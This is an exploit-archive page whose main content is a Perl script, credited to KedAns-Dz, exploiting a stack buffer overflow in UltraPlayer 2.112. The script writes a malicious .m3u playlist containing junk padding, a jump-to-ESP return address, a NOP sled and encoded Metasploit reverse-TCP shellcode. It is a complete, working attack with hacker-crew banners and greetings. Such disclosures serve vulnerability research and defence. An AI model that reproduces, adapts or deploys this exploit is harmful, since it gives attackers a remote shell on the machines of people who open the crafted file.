UltraPlayer 2.112 Buffer Overflow

UltraPlayer 2.112 Buffer Overflow: Posted Jan 24, 2012; Authored by KedAns-Dz; UltraPlayer version 2.112 stack buffer overflow exploit that creates a malicious .m3u file that will trigger a reverse shell.; tags | exploit, overflow, shell; SHA-256 | 96294503f8bfddc167c2244a8894cb4cb8d4325bf34e9db7b30dd6d1cc1a5420; Download | Favorite | View

UltraPlayer 2.112 Buffer Overflow

#!/usr/bin/perl
sub logo {
print STDERR << "EOF";
                                                                   
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

EOF
}
####
# Title : UltraPlayer v2.112 (.m3u) Stack Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns 
# platform : windows ( Local BOF )
# Type : local exploit / Buffer Overflow
#####

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
###

$junk = "\x41" x 313; # Junk
$ret = "\xeb".pack("V", 0x90471230)."\x90\x90"; # jump ESP / nop - uplayer.exe - /nop /nop 
$nops = "\x90" x 48; # n0ps
$acc = "\x41" x 88; # buf
$shell = # win/shell_reverse_tcp | enc=alphaMiX | by : MSF 
"\x89\xe2\xd9\xd0\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" .
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" .
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .
"\x75\x4a\x49\x4b\x4c\x4b\x58\x4c\x49\x45\x50\x45\x50\x47" .
"\x70\x43\x50\x4b\x39\x5a\x45\x56\x51\x49\x42\x52\x44\x4c" .
"\x4b\x56\x32\x50\x30\x4e\x6b\x56\x32\x54\x4c\x4e\x6b\x51" .
"\x42\x54\x54\x4e\x6b\x43\x42\x45\x78\x56\x6f\x58\x37\x52" .
"\x6a\x45\x76\x56\x51\x49\x6f\x56\x51\x4b\x70\x4c\x6c\x47" .
"\x4c\x50\x61\x51\x6c\x43\x32\x56\x4c\x47\x50\x4b\x71\x5a" .
"\x6f\x54\x4d\x47\x71\x58\x47\x49\x72\x5a\x50\x50\x52\x43" .
"\x67\x4e\x6b\x51\x42\x54\x50\x4e\x6b\x51\x52\x45\x6c\x45" .
"\x51\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4d\x55\x4b\x70\x50" .
"\x74\x51\x5a\x47\x71\x5a\x70\x52\x70\x4e\x6b\x51\x58\x54" .
"\x58\x4e\x6b\x52\x78\x47\x50\x47\x71\x4e\x33\x5a\x43\x45" .
"\x6c\x47\x39\x4c\x4b\x45\x64\x4e\x6b\x43\x31\x4e\x36\x54" .
"\x71\x49\x6f\x56\x51\x49\x50\x4e\x4c\x5a\x61\x58\x4f\x56" .
"\x6d\x45\x51\x49\x57\x50\x38\x4d\x30\x43\x45\x58\x74\x56" .
"\x63\x43\x4d\x4b\x48\x47\x4b\x51\x6d\x51\x34\x51\x65\x4b" .
"\x52\x56\x38\x4e\x6b\x56\x38\x54\x64\x56\x61\x58\x53\x45" .
"\x36\x4c\x4b\x56\x6c\x52\x6b\x4e\x6b\x52\x78\x45\x4c\x43" .
"\x31\x4b\x63\x4c\x4b\x47\x74\x4c\x4b\x43\x31\x5a\x70\x4d" .
"\x59\x50\x44\x54\x64\x45\x74\x43\x6b\x43\x6b\x51\x71\x52" .
"\x79\x50\x5a\x43\x61\x4b\x4f\x49\x70\x56\x38\x51\x4f\x52" .
"\x7a\x4e\x6b\x47\x62\x58\x6b\x4c\x46\x51\x4d\x51\x78\x56" .
"\x53\x56\x52\x47\x70\x47\x70\x50\x68\x52\x57\x51\x63\x54" .
"\x72\x43\x6f\x50\x54\x52\x48\x50\x4c\x51\x67\x54\x66\x43" .
"\x37\x4b\x4f\x58\x55\x4d\x68\x4c\x50\x45\x51\x45\x50\x43" .
"\x30\x54\x69\x58\x44\x56\x34\x50\x50\x45\x38\x45\x79\x4d" .
"\x50\x52\x4b\x43\x30\x4b\x4f\x4e\x35\x56\x30\x56\x30\x52" .
"\x70\x56\x30\x47\x30\x52\x70\x47\x30\x56\x30\x50\x68\x58" .
"\x6a\x56\x6f\x4b\x6f\x4b\x50\x49\x6f\x4b\x65\x4c\x49\x5a" .
"\x67\x52\x48\x51\x6f\x45\x50\x43\x30\x43\x31\x45\x38\x54" .
"\x42\x45\x50\x47\x61\x43\x6c\x4d\x59\x5a\x46\x52\x4a\x54" .
"\x50\x43\x66\x43\x67\x51\x78\x4f\x69\x49\x35\x52\x54\x50" .
"\x61\x4b\x4f\x49\x45\x50\x68\x50\x63\x50\x6d\x45\x34\x45" .
"\x50\x4c\x49\x49\x73\x52\x77\x52\x77\x50\x57\x50\x31\x5a" .
"\x56\x51\x7a\x45\x42\x52\x79\x43\x66\x4b\x52\x49\x6d\x50" .
"\x66\x49\x57\x50\x44\x47\x54\x45\x6c\x43\x31\x43\x31\x4c" .
"\x4d\x50\x44\x56\x44\x56\x70\x4f\x36\x47\x70\x52\x64\x51" .
"\x44\x50\x50\x50\x56\x52\x76\x43\x66\x50\x46\x51\x46\x50" .
"\x4e\x50\x56\x56\x36\x52\x73\x52\x76\x50\x68\x43\x49\x5a" .
"\x6c\x45\x6f\x4b\x36\x49\x6f\x49\x45\x4e\x69\x4d\x30\x52" .
"\x6e\x56\x36\x47\x36\x4b\x4f\x50\x30\x43\x58\x45\x58\x4b" .
"\x37\x47\x6d\x43\x50\x4b\x4f\x4e\x35\x4d\x6b\x5a\x50\x58" .
"\x35\x49\x32\x50\x56\x43\x58\x4f\x56\x4c\x55\x4d\x6d\x4d" .
"\x4d\x4b\x4f\x4e\x35\x45\x6c\x43\x36\x43\x4c\x54\x4a\x4b" .
"\x30\x49\x6b\x4d\x30\x54\x35\x54\x45\x4f\x4b\x43\x77\x54" .
"\x53\x43\x42\x52\x4f\x51\x7a\x45\x50\x52\x73\x4b\x4f\x58" .
"\x55\x41\x41";

# Make m3u Ev!L Exploit
my $ked = "http://".$junk."/inj3ct0r.x".$ret.$acc."\x90\x90\x90".$shell.$nops.".mp3";

open(F,'>> Inj3ct0r.m3u');
print F $ked;
close(F);

# sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy 
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

UltraPlayer 2.112 Buffer Overflow

UltraPlayer 2.112 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

UltraPlayer 2.112 Buffer Overflow

Share This

UltraPlayer 2.112 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems